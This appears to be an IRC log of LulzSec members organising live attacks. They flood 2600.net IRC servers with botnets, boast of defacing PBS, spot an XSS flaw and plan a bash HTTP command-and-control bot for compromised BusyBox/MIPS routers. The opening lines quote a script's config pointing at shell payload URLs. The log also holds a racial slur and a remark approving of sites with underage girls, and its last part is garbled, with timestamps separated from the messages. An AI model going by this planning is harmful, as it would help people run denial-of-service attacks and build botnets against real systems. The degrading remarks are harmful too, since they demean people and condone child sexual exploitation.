Jun 01 06:06:06 <lol> ##[ KONFIGURASI URL ]## Jun 01 06:06:06 <lol> my $fx29id = "http://reichenthal.at/pages/s/idxx.txt??? ?"; #Fx29ID (Simple) / (Advanced) Jun 01 06:06:06 <lol> my $fx29id2 = "http://reichenthal.at/pages/s/id2.txt???? "; #Fx29ID (Advanced) Jun 01 06:06:07 <lol> my $fx29sh = "http://reichenthal.at/pages/s/sh.txt????" ; #Fx29Sh (Optional) Jun 01 06:06:07 <lol> my $bypass = "http://reichenthal.at/pages/s/google.php" ; #Google Bypasserz (Optional) Jun 01 06:06:26 <joepie92> >enemy is now known as drowning man Jun 01 06:06:39 <storm> 06:03 -!- Irssi: Connection to collective.2600.net estab lished Jun 01 06:06:39 <storm> 06:03 !collective.2600.net *** Looking up your hostname. .. Jun 01 06:06:39 <storm> 06:03 !collective.2600.net *** Checking Ident Jun 01 06:06:39 <storm> 06:03 !collective.2600.net *** No Ident response Jun 01 06:06:39 <storm> 06:04 !collective.2600.net *** Found your hostname Jun 01 06:06:39 <storm> 06:04 -!- ERROR Closing Link: c-68-56-76-36.hsd1.fl.comc ast.net (Registration Jun 01 06:06:39 <storm> timed out) Jun 01 06:06:53 <storm> 06:06 -!- Irssi: Looking up djslocker.2600.net Jun 01 06:06:53 <storm> 06:06 -!- Irssi: Connecting to djslocker.2600.net [173.1 65.207.25] port 6667 Jun 01 06:07:14 <storm> madjacks back Jun 01 06:07:19 <lol> storm: you got the file so i can delete it? Jun 01 06:07:25 <storm> sec Jun 01 06:07:28 <storm> ya Jun 01 06:07:29 <storm> got it Jun 01 06:07:32 <lol> :) Jun 01 06:07:50 <lol> there's alot to config in it :O Jun 01 06:08:05 <lol> but hopefully the google bypass "google.php" will still work :D Jun 01 06:08:09 <storm> i wouldnt know, it looks like a rar file :P Jun 01 06:08:14 <storm> it is a rar file! Jun 01 06:08:19 <storm> FARKIN HELL Jun 01 06:08:20 <storm> lol Jun 01 06:08:23 <lol> *windows* Jun 01 06:08:24 <lol> xD Jun 01 06:08:27 <storm> what kind of linux hacked box has rar Jun 01 06:08:27 <storm> !!! Jun 01 06:09:13 <lol> xD Jun 01 06:09:34 <storm> 06:09 -!- djslocker.2600.net ---------------------- Users: 21 Jun 01 06:10:48 <Topiary> collective.2600.net ----------------------------- Users: 80 (38.8% Jun 01 06:11:10 <storm> lmao Jun 01 06:11:11 <storm> dude Jun 01 06:11:16 <storm> i took down everything then Jun 01 06:11:20 <storm> cause madjacks nulled Jun 01 06:11:35 <Topiary> just got kicked off collective Jun 01 06:11:45 <storm> lolz Jun 01 06:11:50 <Topiary> we should just do this every day until they refu se to house Jester Jun 01 06:11:51 <storm> should i let it back up? Jun 01 06:12:05 <Topiary> whatever you want Jun 01 06:12:13 <storm> k Jun 01 06:13:49 <Topiary> or maybe we should just pwn 2600.net itself Jun 01 06:16:21 <storm> well that was fun XD Jun 01 06:17:48 <Topiary> I love their little clique circlejerks Jun 01 06:17:55 <Topiary> they all have a little retweet party with themse

lves Jun 01 06:18:11 <storm> they tweeting? Jun 01 06:19:00 <Topiary> yeah check out the feeds of @mach2600 @fakegregg housh @awinee and all retweets Jun 01 06:19:15 <Topiary> these are the same guys who specifically went af ter Sabu + our crew back in Feb with HBGary Jun 01 06:19:24 <Topiary> they're a lovable bunch of scoundrels Jun 01 06:21:10 <Topiary> err, madjack just disappeared :x Jun 01 06:22:00 <storm> lol Jun 01 06:25:04 <joepie92> disappeared as in...? Jun 01 06:25:33 <Topiary> it's back Jun 01 06:25:48 <storm> its cause it gets nulled Jun 01 06:25:49 <storm> for 5 min Jun 01 06:26:23 <storm> lol Jun 01 06:26:35 <storm> thats the funnest shit ive done with 2 servers ^_^ Jun 01 06:26:45 <storm> who woulda thought 3 ircds could die to 2 boxes Jun 01 06:27:13 <Topiary> well it's good taking out 2/3, watching them scr amble to the 3rd, letting them come back, then fucking the 3rd while laying off the other 2 Jun 01 06:27:19 <Topiary> like playing with rats and switches Jun 01 06:27:37 <storm> haha Jun 01 06:27:41 <storm> i could drop all 3 at once Jun 01 06:27:45 <storm> if i wanted Jun 01 06:27:50 <storm> just take 2 more box logins Jun 01 06:28:05 <storm> but theres no fun in that ;< Jun 01 06:28:29 <Topiary> * [Brainsturbator] (skully2012@71-23-43-101.war. clearwire-wmx.net): Agent Skully Jun 01 06:28:29 <Topiary> * [Brainsturbator] #lulzsec #secnews #telephreak #2600 Jun 01 06:28:30 <Topiary> who is this? Jun 01 06:28:48 <storm> no idea Jun 01 06:28:58 <Topiary> we don't either, hmm Jun 01 06:30:51 <storm> Agent Skully Jun 01 06:30:55 <storm> better watch out Jun 01 06:31:00 <storm> hes an 4g3n+ Jun 01 06:31:46 <joepie92> lolol Jun 01 06:31:47 <joepie92> Since the hack, LulzSec has turned it attention towards patriot hacker Jester, the most prominent member of the anti-Wikileaks c yber-militia, who attacked WikiLeaks after the release of US diplomatic cables. Unsurprisingly, LulzSec claimed his hacks were "lame" before threatening an atta ck against long-running hacker magazine 2600. Jun 01 06:31:50 <joepie92> jester gonna be mad Jun 01 06:31:54 <joepie92> I R NO PART OF MILITIA Jun 01 06:31:56 <joepie92> I R LONE WOLF Jun 01 06:32:09 <Topiary> >claimed his hacks Jun 01 06:32:11 <Topiary> >his hacks Jun 01 06:32:15 <Topiary> we actually claimed he did no hacks Jun 01 06:32:16 <Topiary> which he didn't Jun 01 06:32:24 <Topiary> please name one time Jester has hacked anything, I dare ya Jun 01 06:32:33 <storm> lol Jun 01 06:32:52 <joepie92> I suppose you could call modding LOIC to collect IPs, hacking. Jun 01 06:33:02 <joepie92> [/devilsadvocate[ Jun 01 06:33:03 <joepie92> ]* Jun 01 06:42:18 <lol> lol xD Jun 01 06:42:26 <lol> i read on some sec site Jun 01 06:42:31 <lol> who has a j35t3r page Jun 01 06:42:44 <lol> wrote how someone "cracked LOIC and altered it" Jun 01 06:42:58 <lol> lol i was like "errr.... the src is pub lol"

Jun 01 06:44:03 <lol> when all my brazillians get on im gonna dos them too :3 Jun 01 06:44:32 <lol> only 34 in channel :o pointless yet, wait for the brazil lians get get online should have about 70/80 :D Jun 01 06:45:29 <Topiary> I snagged us some nice USAs the other day Jun 01 06:45:35 <Topiary> hopefully good net Jun 01 06:45:49 <lol> yeh :D Jun 01 06:46:14 <lol> those [NEW] in there are US installs too i think Jun 01 06:46:34 <storm> rofl Topiary Jun 01 06:46:37 <storm> your servers down Jun 01 06:46:52 <Topiary> damnit I was on collective Jun 01 06:46:56 <Topiary> and so are you >:[ Jun 01 06:47:10 <storm> not uh Jun 01 06:47:12 <storm> im on djs Jun 01 06:47:15 <storm> i think Jun 01 06:47:18 <Topiary> no sir Jun 01 06:47:21 <Topiary> we're all on collective Jun 01 06:47:36 <Topiary> ohhhh shit Jun 01 06:47:41 <Topiary> you guys are, I'm on collective Jun 01 06:47:43 <Topiary> ffffffff Jun 01 06:48:05 <storm> lolllllllll Jun 01 06:48:10 <storm> lets switch servers then Jun 01 06:49:30 <joepie92> cam someone explain to me why windows software r unning through WINE on puppy linux in a virtualbox instance runs faster than nat ively on the host windows system Jun 01 06:49:36 <joepie92> : Jun 01 06:49:38 <joepie92> can* Jun 01 06:52:40 <storm> Topiary can you map? Jun 01 06:52:46 <storm> on collective Jun 01 06:52:56 <Topiary> * collective.2600.net ----------------------------- Users: 204 (49.4%) Jun 01 06:52:56 <Topiary> * `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 01 06:52:56 <Topiary> * - madjack.2600.net ------------------------ Users: 99 (24.0%) Jun 01 06:52:56 <Topiary> * - djslocker.2600.net ---------------------- Users: 101 (24.5%) Jun 01 06:52:56 <Topiary> * `- services.2600.net ----------------------- Users: 9 (2.2% Jun 01 06:53:01 <storm> so it worked Jun 01 06:53:03 <storm> bah! Jun 01 06:53:04 <storm> lol Jun 01 06:53:11 <storm> they definitely changed the server around Jun 01 06:54:21 <lol> what channel are you guys in over there :D? Jun 01 06:54:30 <Topiary> lulzsec Jun 01 06:54:33 <Topiary> and 2600 Jun 01 06:56:39 <storm> cant believe they stepped up their game Jun 01 06:56:41 <storm> lmao Jun 01 06:57:02 <lol> op me am parr0t xD Jun 01 07:03:13 <storm> 07:01 -!- bottle_of_rum [~bottle_of@72.46.129.46] has qu it [Ping timeout: 240 Jun 01 07:03:13 <storm> seconds] Jun 01 07:03:13 <storm> 07:01 -!- echo [~echo@pool-108-27-212-254.nycmny.fios.ve rizon.net] has quit Jun 01 07:03:13 <storm> [Ping timeout: 240 seconds] Jun 01 07:03:13 <storm> 07:01 -!- RootBSD_ [~rootbsd@r00ted.com] has quit [Ping timeout: 240 seconds] Jun 01 07:03:13 <storm> 07:02 -!- bottle_of_rum [~bottle_of@72.46.129.46] has jo ined #2600 Jun 01 07:03:13 <storm> 07:02 < storm> uh oh Jun 01 07:03:13 <storm> 07:02 -!- isaac [~isaac@24.167.38.73] has quit [Ping tim

eout: 240 seconds] Jun 01 07:03:13 <storm> 07:02 -!- m0no [natas@c-75-67-212-35.hsd1.ma.komcast.net ] has quit [Quit: Jun 01 07:03:13 <storm> changing servers] Jun 01 07:03:14 <storm> 07:02 -!- ZadYree [~ZadY@ip-87.net-89-2-31.rev.numericab le.fr] has quit [Ping Jun 01 07:03:15 <storm> timeout: 240 seconds] Jun 01 07:03:16 <storm> 07:02 -!- warmonger [~hehe@108-65-79-77.lightspeed.sntcc a.sbcglobal.net] has Jun 01 07:03:16 <storm> quit [Ping timeout: 240 seconds] Jun 01 07:03:18 <storm> 07:02 < storm> magickal Jun 01 07:03:18 <storm> 07:02 -!- The_Blob [~blob@S010600c00cb01b8c.vs.shawcable .net] has quit [Ping Jun 01 07:03:19 <lol> lol @ Highest connection count: 802 (801 clients) (95744 connections received) Jun 01 07:03:20 <storm> timeout: 240 seconds] Jun 01 07:03:21 <storm> 07:03 < storm> magickal indeed Jun 01 07:03:22 <storm> 07:03 -!- WebDawg [~whoami@officialg0d.com] has quit [Pi ng timeout: 240 seconds] Jun 01 07:03:22 <storm> lmfao Jun 01 07:03:24 <Sabu> its that sx Jun 01 07:03:26 <Sabu> sex Jun 01 07:03:44 <lol> sbau you're the sex ;D Jun 01 07:03:57 <Topiary> well lawdy Jun 01 07:04:16 <lol> abusing 2600 is rather amusing Jun 01 07:04:35 <storm> lolz Jun 01 07:04:50 <storm> Flood completed, 254326485 packets sent, 447 seconds, 56 8963 packets/sec Jun 01 07:04:51 <Sabu> lol Jun 01 07:04:58 <Sabu> I wake up to storm packeting Jun 01 07:05:02 <storm> lol Jun 01 07:05:03 <Sabu> and kayla excited Jun 01 07:05:04 <Sabu> <3 Jun 01 07:05:06 <storm> xD Jun 01 07:05:11 <Sabu> what you niggas been doing without me Jun 01 07:05:20 <storm> owning 2600.net Jun 01 07:05:21 <storm> about it Jun 01 07:05:39 <Sabu> jEa Jun 01 07:06:05 <joepie92> lol Jun 01 07:06:15 <joepie92> morning Sabu Jun 01 07:11:12 <storm> indeed Jun 01 07:11:15 <storm> morning Jun 01 07:11:45 <Sabu> morning joepie Jun 01 07:11:50 <Sabu> hows everyone doing? Jun 01 07:11:51 * Sabu gives channel operator status to [redacted] value T opiary lol Jun 01 07:12:17 <storm> nulled madjack Jun 01 07:12:19 <storm> again Jun 01 07:12:20 <storm> lol Jun 01 07:12:31 <Sabu> lol Jun 01 07:12:39 <Sabu> they're going to end up losing some servers Jun 01 07:13:12 <Sabu> I want to own 2600 servers themselves Jun 01 07:14:21 <Topiary> that would be awesome Jun 01 07:16:42 <Sabu> topiary my brother how are you Jun 01 07:17:34 <storm> Topiary watch for magickal splitz Jun 01 07:17:38 <Topiary> good Sabu, what's up? Jun 01 07:18:58 <Sabu> nothing broscope just woke up tired as balls Jun 01 07:22:01 <joepie92> my fucking god Jun 01 07:22:07 <joepie92> evilworks raging out of his fucking skull Jun 01 07:22:16 <Topiary> what about?

Jun 01 07:22:25 <joepie92> earlier today he sajoined the entire network to #lounge Jun 01 07:22:29 <joepie92> and then did a massive spam/highlight Jun 01 07:22:31 <joepie92> of everyone in the channel Jun 01 07:22:40 <joepie92> and consecutively got localkilled by me and owen Jun 01 07:22:45 <joepie92> now like 10 mins ago Jun 01 07:22:48 <joepie92> he starts raging in #opers Jun 01 07:22:52 <joepie92> that he is missing some capabilities Jun 01 07:22:52 <joepie92> as oper Jun 01 07:22:58 <joepie92> and is apparently not in the operserv admin list anymoer Jun 01 07:23:05 <joepie92> starts masshighlighting opers Jun 01 07:23:05 <Topiary> yeah remember that he killed both of us for simp ly disagreeing with him? Jun 01 07:23:10 <joepie92> raging out of his skull Jun 01 07:23:15 <joepie92> despite owen not even being fucking there Jun 01 07:23:16 <Topiary> in #reporter Jun 01 07:23:21 <Topiary> he's a hot-tempered child Jun 01 07:23:22 <joepie92> and logic tells me that owen was the only person who could do that Jun 01 07:23:26 <storm> i remember owen Jun 01 07:23:43 <joepie92> anyhow, after a localkill and some shouting back that he should calm the fuck down, he seems to be more calm now Jun 01 07:23:44 <joepie92> -_Jun 01 07:23:51 <Topiary> you know these chaps with IRC technical prowess have it covered in that area Jun 01 07:23:52 <joepie92> "CAN'T YOU TAKE A JOKE?!?!" Jun 01 07:23:55 <joepie92> seriously Jun 01 07:23:56 <Topiary> but outside of that, they're retarded Jun 01 07:24:02 <joepie92> if you don't want shit to happen, then don't sta rt shit yourself -_Jun 01 07:24:14 <joepie92> ugh Jun 01 07:24:30 <joepie92> inb4 I get localkilled by evilworks again Jun 01 07:24:44 <joepie92> crhist Jun 01 07:24:45 <Topiary> "agree with me or a z:line you" is evilworks' fo dder Jun 01 07:24:45 <joepie92> christ* Jun 01 07:24:48 <joepie92> anyhow, /rant Jun 01 07:25:21 <Topiary> this will cheer you up; http://blogs.forbes.com/ parmyolson/2011/05/31/interview-with-pbs-hackers-we-did-it-for-lulz-and-justice/ Jun 01 07:25:41 <joepie92> lol, parmy is teh win Jun 01 07:26:06 <Topiary> it's fun to upset other journalists by giving pa rmy exclusives Jun 01 07:26:15 <Topiary> her original Tupac report got the most views of any Jun 01 07:26:18 <joepie92> lool Jun 01 07:26:18 <Topiary> and it got tweeted by wikileaks Jun 01 07:26:21 <joepie92> ye Jun 01 07:26:23 <joepie92> and it got referenced Jun 01 07:26:25 <joepie92> by all dutch news sources Jun 01 07:26:29 <joepie92> also Jun 01 07:26:35 <joepie92> inb4 raeg because it's poptart cat and not nyan cat Jun 01 07:26:46 <Topiary> over the last 6 months, we've probably given Par my more views than she's had in her entire career Jun 01 07:27:23 <Topiary> still: http://i.imgur.com/DsgWI.jpg Jun 01 07:27:27 <Topiary> our greatest achievement to date? Jun 01 07:27:45 <joepie92> lolol Jun 01 07:27:49 <joepie92> nyancat in wsj Jun 01 07:28:05 <joepie92> also, people help each other I guess :P

Jun 01 07:28:13 <joepie92> Parmy gets views, anon/lulzsec gets exposure Jun 01 07:28:23 <joepie92> and notable sources :D Jun 01 07:28:42 <Topiary> Parmy has a friend over at WSJ, she's gonna ask him if they had a good time over the printing of nyan cat Jun 01 07:28:54 <Topiary> she's like our wonderful media outlet 0day Jun 01 07:29:01 <joepie92> loool Jun 01 07:29:13 <lol> lololol Jun 01 07:29:28 <Topiary> Parmy "0day" Olson Jun 01 07:29:32 <Topiary> she's a nice lady Jun 01 07:30:13 <joepie92> LulzSec also defaced the official PBS statement in response to the attack. PBS could not be reached for further comment. Jun 01 07:30:14 <joepie92> lol Jun 01 07:30:19 <Topiary> ah yes Jun 01 07:30:19 <joepie92> becauseyourfurthercommentpagewasdown.jpeg Jun 01 07:30:27 <Topiary> I believe that was "LOL FRONTLINE SUCKS COCKS" Jun 01 07:30:33 <joepie92> ahaha Jun 01 07:30:38 <Topiary> http://pastehtml.com/view/avg12f6sz.html Jun 01 07:30:42 <Topiary> this used to be pbs.org/whiskey Jun 01 07:31:55 <storm> Nightmare966 NoName Jun 01 07:31:55 <storm> @ Jun 01 07:31:56 <storm> @LulzSec Lemme get this straight... You could do great t hings like ctaching pedos but you decide attack Sony ._. Jun 01 07:31:59 <storm> ROFLMFAO Jun 01 07:32:02 <storm> thats epic Jun 01 07:32:42 <storm> leave the paedos alone, they already haz it bad enough. Jun 01 07:32:51 <Topiary> it's actually true though, I dox'd a pedo once Jun 01 07:32:58 <storm> lol Jun 01 07:33:00 <Topiary> probably helped get him arrested Jun 01 07:33:08 <storm> yuck Jun 01 07:33:12 <Topiary> :( Jun 01 07:33:17 <storm> i hate anyone getting arrested Jun 01 07:33:21 <Topiary> well I never knew if he was arrested Jun 01 07:33:22 <storm> just a personal view of mine ;x Jun 01 07:33:28 <Topiary> didn't even know he was a pedo until I leaked hi s hotmail Jun 01 07:33:32 <storm> hahaha Jun 01 07:33:45 <Topiary> he had attachments of CP Jun 01 07:33:51 <Topiary> and chatted up young girls Jun 01 07:34:50 <storm> at least he had good taste Jun 01 07:34:51 <storm> ;x Jun 01 07:34:59 <storm> girls = way to be Jun 01 07:35:19 <storm> there are indefinite under age girls on motherless.com Jun 01 07:39:52 * storm see's everyone fapping Jun 01 07:43:35 <lol> :/ Jun 01 07:46:54 <storm> lol Jun 01 07:47:44 * lol helps Jun 01 07:48:53 <storm> OMG Jun 01 07:48:54 <storm> so Jun 01 07:49:01 <storm> my gigabit box i owned a few days ago Jun 01 07:49:06 <storm> has a publ;ic key to another one Jun 01 07:49:09 <storm> fucking owned Jun 01 07:49:09 <storm> ;x Jun 01 07:49:27 <lol> nice :D Jun 01 07:49:27 <Topiary> more cannons! Jun 01 07:49:39 <Topiary> you're definitely our LulzSec cannonfire officer Jun 01 07:49:46 <lol> 2xDATAFLOW Jun 01 07:49:54 <Topiary> kayla is our assassin/spy Jun 01 07:50:02 <Topiary> we dock in ports and she immerses = Jun 01 07:50:04 <Topiary> and eliminates Jun 01 07:50:10 <lol> i also bake cookies :3

Jun 01 07:50:52 <lol> currently 46 boats in the harbour Jun 01 07:51:16 <lol> * [^_^]-70335 ([^_^]-70335@HA-ek9.ljf.k5jhin.IP) Quit Jun 01 07:51:21 <lol> 45* Jun 01 07:54:07 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 07:57:54 <lol> firing cannons @ collective.2600.net Jun 01 07:58:46 <joepie92> <storm>i hate anyone getting arrested Jun 01 07:58:48 <joepie92> agreed Jun 01 07:58:54 <joepie92> last resort imo Jun 01 07:59:17 <storm> :] Jun 01 07:59:27 <lol> C:\Documents and Settings\kayla>ping collective.2600.net Jun 01 07:59:27 <lol> Pinging collective.2600.net [208.111.35.75] with 32 byte s of data: Jun 01 07:59:27 <lol> Request timed out. Jun 01 07:59:27 <lol> Request timed out. Jun 01 07:59:27 <lol> Request timed out. Jun 01 07:59:27 <lol> Request timed out. Jun 01 07:59:27 <lol> Ping statistics for 208.111.35.75: Jun 01 07:59:27 <lol> Packets: Sent = 4, Received = 0, Lost = 4 (100% loss ), Jun 01 07:59:27 <lol> C:\Documents and Settings\kayla> Jun 01 07:59:30 <lol> looooooooooooool Jun 01 07:59:36 <storm> EWWWWWWWWW Jun 01 07:59:41 <lol> dos'd with 45 bots Jun 01 07:59:41 <storm> CMD PROMPT Jun 01 07:59:44 <storm> ZOMG Jun 01 07:59:46 <storm> I DIED Jun 01 07:59:50 <lol> lol Jun 01 07:59:53 <storm> lol Jun 01 07:59:53 <storm> :x Jun 01 07:59:56 <lol> :D Jun 01 08:00:24 * joepie92 thinks kayla MUST have modded her terminal to l ook like cmd Jun 01 08:03:14 <storm> loll Jun 01 08:11:13 * Topiary (t@HA-31n.h6t.9puaba.IP) has joined #pure-elite Jun 01 08:12:48 <joepie92> if you're bored Jun 01 08:12:49 <joepie92> view-source:www.easyhits4u.com/index.cgi?warning =hai Jun 01 08:12:52 <joepie92> er Jun 01 08:12:56 <joepie92> http://www.easyhits4u.com/index.cgi?warning=hai Jun 01 08:13:11 <lol> whats tht ;p? Jun 01 08:13:13 * joepie92 smells XSS Jun 01 08:13:46 <joepie92> :D Jun 01 08:14:12 <storm> hey kayla Jun 01 08:14:15 <storm> can i pm joo Jun 01 08:15:06 <lol> sure :D Jun 01 08:24:55 * voodoo has quit (Connection closed) Jun 01 08:36:38 * voodoo (voodoo@HA-32o.s8p.durho2.IP) has joined #pure-el ite Jun 01 08:51:04 <joepie92> some people Jun 01 08:51:05 <joepie92> are so fucking stupid Jun 01 08:51:06 <joepie92> "stupid" in the sense that they assume the curre nt systems are the only way to go, that they will judge any system that works di fferently as "bad" or "inferior", and saying that you would be "throwing away hu ndreds of years of knowledge", ignoring the "tested systems" Jun 01 08:51:07 <joepie92> and for ease of complaint, ignoring that those " tested systems" have fallen over and over again Jun 01 08:51:16 <joepie92> http://www.quora.com/Is-the-cryptocurrency-Bitco in-a-good-idea Jun 01 08:51:20 <joepie92> read the top comment Jun 01 08:56:47 <lol> uname -a

Jun 01 08:56:49 <lol> oops Jun 01 08:57:35 <storm> lol Jun 01 08:57:36 <storm> :D Jun 01 08:57:42 <storm> i do that a lot Jun 01 08:57:50 <storm> cause my terminals are transparent Jun 01 08:58:25 * Topiary has quit (Quit: sec) Jun 01 09:03:10 <joepie92> lol Jun 01 09:15:19 * Topiary (t@HA-d98.pu6.75e5ku.IP) has joined #pure-elite Jun 01 09:35:45 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-el ite Jun 01 09:35:52 * pwnsauce (pwnsauce@HA-pin.jre.pn6gun.IP) has joined #pur e-elite Jun 01 09:35:58 * anonny is now known as kl0ps Jun 01 09:36:06 <kl0ps> hello o/ Jun 01 09:36:14 <pwnsauce> heu Jun 01 09:36:17 <pwnsauce> *hey Jun 01 09:36:54 <pwnsauce> whass happening? Jun 01 09:37:35 <kl0ps> nothing, all is fine,... perfect ;) Jun 01 09:37:36 <kl0ps> sup Jun 01 09:37:37 <kl0ps> ? Jun 01 09:48:28 <pwnsauce> not much Jun 01 09:55:02 <Topiary> I'm celebration of our whiskey page I am now usi ng a Moldova server location Jun 01 09:55:04 <Topiary> *In Jun 01 10:04:10 <joepie92> buyvm gone again Jun 01 10:08:57 -NickServThis nickname is registered and protected. If i t is your Jun 01 10:08:57 -NickServnick, type /msg NickServ IDENTIFY password. Oth erwise, Jun 01 10:08:57 -NickServplease choose a different nick. Jun 01 10:15:46 * kl0ps has quit (Connection closed) Jun 01 10:28:43 * kay (parr0t@HA-p7h.2se.thhlfj.IP) has joined #pure-elite Jun 01 10:29:40 * lol has quit (Ping timeout: 121 seconds) Jun 01 10:38:17 * kay is now known as lol Jun 01 10:55:11 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 01 11:09:22 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-el ite Jun 01 11:09:33 * anonny is now known as kl0ps Jun 01 11:31:49 * kl0ps has quit (Quit: Leaving) Jun 01 12:13:58 * pwnsauce (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pur e-elite Jun 01 12:19:19 <pwnsauce> :D\-< Jun 01 12:19:25 <pwnsauce> :D -< Jun 01 12:19:28 <pwnsauce> :D/-< Jun 01 12:19:34 <Topiary> ^^^^^^^^^^^^^^^^^^ Jun 01 12:19:39 <Topiary> _________________________ Jun 01 12:19:45 <Topiary> ________________________________________________ ____________________ Jun 01 12:19:54 <Topiary> 8=========================D Jun 01 12:20:03 <Topiary> your stick dude fell into a sea of cocks Jun 01 12:20:35 <joepie92> lolol Jun 01 12:20:43 * joepie92 does some shameless plugging for bitcoin Jun 01 12:21:37 * Neuron (Neuron@HA-26h.345.a84vd3.IP) has joined #pure-el ite Jun 01 12:21:40 <Neuron> o/ Jun 01 12:23:05 <joepie92> lolwat Jun 01 12:23:06 <joepie92> guise Jun 01 12:23:06 <joepie92> http://nf.dyndns.org/?poll=3 Jun 01 12:23:16 <joepie92> I seriously got more bitcoin donations Jun 01 12:23:19 <joepie92> than pioneer one

Jun 01 12:23:56 <Neuron> lmfao wow Jun 01 12:23:57 <Neuron> nice Jun 01 12:24:07 <joepie92> I googled the anonnews address Jun 01 12:24:08 <joepie92> and that came up Jun 01 12:24:08 <joepie92> xD Jun 01 12:26:10 <Neuron> hmm Jun 01 12:26:16 <Neuron> ping dosen't like to be a background process Jun 01 12:28:01 <joepie92> lolol Jun 01 12:29:04 <Neuron> lol: you on? Jun 01 12:29:12 <lol> yeh :D Jun 01 12:29:37 <Neuron> talked to [redacted] about everything Jun 01 12:29:44 <Neuron> building a cnc system for the busybox's Jun 01 12:29:52 <Neuron> lul for bash bot :D XD Jun 01 12:30:01 <Neuron> if you can send me that list of all of them that would be awesome Jun 01 12:30:03 <[redacted]> sup Jun 01 12:30:08 <Neuron> hey [redacted] o/ Jun 01 12:30:33 <[redacted]> just woke up :] Jun 01 12:32:00 * lol has quit (A TLS packet with unexpected length was re ceived.) Jun 01 12:32:11 * lol (parr0t@HA-678.11n.cc0br2.IP) has joined #pure-elite Jun 01 12:32:19 <Neuron> wb lol Jun 01 12:32:28 <lol> :) Jun 01 12:32:31 <lol> ty <333 Jun 01 12:32:37 <Neuron> lol: do you have the list on you? Jun 01 12:32:58 <lol> no it's on my netbook, i should be able to get it tonigh t Jun 01 12:33:04 <Neuron> lol: Idk if you left but i was talking to [redac ted] and we decided to work on a small cnc type bot with the busybox's Jun 01 12:33:07 <Neuron> bashbot XD Jun 01 12:33:08 <lol> did many from tht other list work? Jun 01 12:33:18 <Neuron> about 15-20 :/ Jun 01 12:33:39 <lol> the other list i have is just as old as tht Jun 01 12:33:49 <lol> the problem is tht range is dynamic Jun 01 12:34:01 <lol> so it has to be re scanned regulary Jun 01 12:34:08 <lol> i got some good boxes to scan from Jun 01 12:34:16 <lol> ill just scan the range again Jun 01 12:34:18 <Neuron> thats fine. Can you rescan the range? Jun 01 12:34:24 <lol> yeh :) Jun 01 12:34:38 <lol> ill set some screen sessions up scanning later tonight : ) Jun 01 12:34:54 <Neuron> cool once we have the bot in place it won't matt er what ip there on :) there just going to pull a command from a webserver every now and then Jun 01 12:35:15 <lol> :) Jun 01 12:35:30 <lol> i just had a hard time getting anything i compile to exe cute on them Jun 01 12:35:39 <lol> evenn such simple mips asm Jun 01 12:35:57 <Neuron> yeah thats why im going the bash route XD i coul dn't get anything to run on them as well Jun 01 12:36:08 <lol> i was hoping to just cross compile a kaiten but it's not tht simple hahahahaa Jun 01 12:36:25 <lol> Unexpected ) error all the time Jun 01 12:37:22 <lol> now if we could remote update them, we could modify a fi rmware Jun 01 12:37:35 <lol> but i dont think thats possible Jun 01 12:37:41 <Neuron> nope Jun 01 12:37:42 <[redacted]> keep it simple Jun 01 12:37:44 <[redacted]> write the bot in bash Jun 01 12:37:48 <[redacted]> using HTTP for CnC

Jun 01 12:37:50 Jun 01 12:37:55 Jun 01 12:38:22 Jun 01 12:38:35 Jun 01 12:38:43 Jun 01 12:38:46 Jun 01 12:38:48 Jun 01 12:38:53 Jun 01 12:38:57 Jun 01 12:39:03 Jun 01 12:39:24 Jun 01 12:39:27 Jun 01 12:39:32 Jun 01 12:39:33 Jun 01 12:39:45 Jun 01 12:39:48 Jun 01 12:39:57 Jun 01 12:40:06 Jun 01 12:40:08 Jun 01 12:40:18 Jun 01 12:40:29 Jun 01 12:40:31 Jun 01 12:40:39 Jun 01 12:40:44 Jun 01 12:40:46 Jun 01 12:40:49 Jun 01 12:40:51 Jun 01 12:40:58 Jun 01 12:41:03 Jun 01 12:41:07 Jun 01 12:41:13 Jun 01 12:41:34 i hate bash Jun 01 12:42:26 Jun 01 12:42:29 Jun 01 12:42:32 Jun 01 12:42:34 Jun 01 12:42:43 Jun 01 12:42:51 Jun 01 12:43:00 Jun 01 12:43:05 Jun 01 12:43:07 Jun 01 12:43:08 Jun 01 12:43:13 Jun 01 12:43:17 Jun 01 12:43:19 Jun 01 12:43:29 Jun 01 12:43:55 Jun 01 12:43:58 Jun 01 12:44:06 Jun 01 12:44:18 ady on them Jun 01 12:44:26 Jun 01 12:44:30 Jun 01 12:44:52 em Jun 01 12:45:07 g TELENT Jun 01 12:45:17 Jun 01 12:45:40

<lol> but people have modified them <lol> i found one with php on once <lol> some of them have aspx scripts on them <lol> they're really weird things <Neuron> yeah but the aspx scripts only workfor local <lol> but they only have like 2MB memory <Neuron> intranet <Neuron> so there 192 address <pwnsauce> hey hey <Neuron> o/ hey pwnsauce <pwnsauce> whats up? <pwnsauce> kaiten botting? <pwnsauce> * MIPS router bottinh? <pwnsauce> ok <pwnsauce> Kayla - I have some good code here <pwnsauce> a HTTP bot <pwnsauce> now what we can do is try cross compile that <pwnsauce> else, have a perl bot we can convert to BASH <pwnsauce> or ASH <pwnsauce> * a HTTP perl bot <Neuron> yup <Neuron> MIPS bottin <pwnsauce> Ive been researching it <pwnsauce> can they run shell scripts? <Neuron> i was trying to find PSYBOT <Neuron> pwnsauce: yeah <pwnsauce> ok <pwnsauce> onesec <pwnsauce> inb4linkage <Neuron> lol <Neuron> if you have a bot ill love you forever XD <Neuron> if not im going to have to write a bash bot and <pwnsauce> http://machinized.com/products.php <pwnsauce> look at <pwnsauce> "Hybrid" <pwnsauce> its Perl <pwnsauce> now I can try re writing some of it <lol> but we can't install perl on them xD <pwnsauce> kayla - i know <pwnsauce> but perl is closer to BASH <pwnsauce> than C <pwnsauce> :D * Neuron facepalm <pwnsauce> also QuadNX <pwnsauce> is in C <Neuron> can't compile for them <pwnsauce> *thinks* <pwnsauce> brb 1 sec <pwnsauce> my brains not working right I think <lol> i think we're just going to have to work with whats alre <lol> <lol> <lol> <lol> <lol> <lol> see i know people who said they've botted them but no ones proved it i think we're just going to have to make a loader for th now i remember you can load CISCO routers in to IRC usin i wonder if the same can be done for these let me find it

